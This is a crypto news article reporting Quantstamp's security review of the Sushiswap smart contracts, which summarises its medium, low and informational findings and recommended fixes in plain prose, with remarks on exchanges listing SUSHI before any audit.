Quantstamp issues Security Review on Sushiswap

Quantstamp's gave 2 medium, 3 low and 5 informational security reviews on Sushiswap

By · Sep 4, 2020 . 8min read

Quantstamp latest news

Smart contract security audit firm, Quantstamp, Sushiswap’s Chef Nomi’s open invitation for security audit issues review report.

In a tweet, Quantstamp highlights the key areas it risk issues in the Sushiswap protocol. It categorised them into three: medium, low and informational risk levels.

Quantstamp’s gave 2 medium, 3 low and 5 informational security reviews on Sushiswap.

Firstly, Quantstamp says it found two medium-security issues. The add() which it says does not prevent the same LP token from being added more than once. If an LP mistakenly adds a token, this will cause the contract to reset associated rewards. The security audit firm recommends creating a mapping from addresses to booleans. This will help in mapping LP tokens to true once added. Furthermore, this boolean function could then have a require-statement preventing the same LP token from being added twice.

Still, on medium risk issues, the migrate() is dependent on a currently unspecified migrator contract. Anyone who can set it to any contract can equally steal users funds. Especially, if the hacker or malicious party have access to an LPs private key without the latter knowing.

Now to the low-security level, Quantstamp found three issues during Sushiswap’s contract review. First was devAddr, which it found to receive 9% of every SUSHI distribution instead of 10% contrary to what Sushiswap documents claims. Still in this category, Quantstamp claims the _moveDelegates() may not behave correctly after token transfers. Although Quantstamp says, it’s not clear how that issue functions, it issues a recommendation. It says Sushiswap should provide adequate user documentation for this. Also, it thinks _moveDelegates() should be invoked in _transfer(). However, Quanstamp warns in the security review that votes on Sushiswap may be more easily “bought”. Especially if LPs acquire SUSHI tokens on exchanges instead of mining them by providing liquidity. Lastly on low security risk level is the massUpdatePools() function. It warns that this may run out-of-gas if LPs add too many tokens.

Furthermore, it found about five informational issues, some of which includes: emergencyWithdraw(), Consistency of privileged roles across contracts, Missing constructor checks, among others. Quantstamp published the full details of the review on its Github account.

Security Review is not the same as an Audit report.

Before anyone could get excited about Quantstamping finding no high-security risks in Sushiswap contract review, it issued a disclaimer. It makes clear that a security review is different from a thorough, smart contract audit. The security firm points to its last review of the yEarn Finance platform, which the growing DeFi community found useful.

Peckchield, another smart contract firm, also recently concluded SushiSwap audit. Chef Nomi, the anonymous Sushiswap creator, posted this in one of his latest tweets.

Until now, Sushiswap records an almost $1.4 billion total value locked – TVL with SUSHI currently trading at $5.97.

Quantstamp security review Sushiswap
Source: Zippo

Besides, Binance, OKEx are among the top big exchanges that rushed to list SUSHI before any external security audit report. This is typically not the way most of the big exchanges operate. Perhaps the DeFi boom is changing the landscape, causing the big guns to review their M.O. Clearly, no one wants to miss out on the pricey transaction fees traders incur while trading their choice DeFi tokens. Certainly not the big exchanges.

Follow Cryptodose for daily updates.

         All News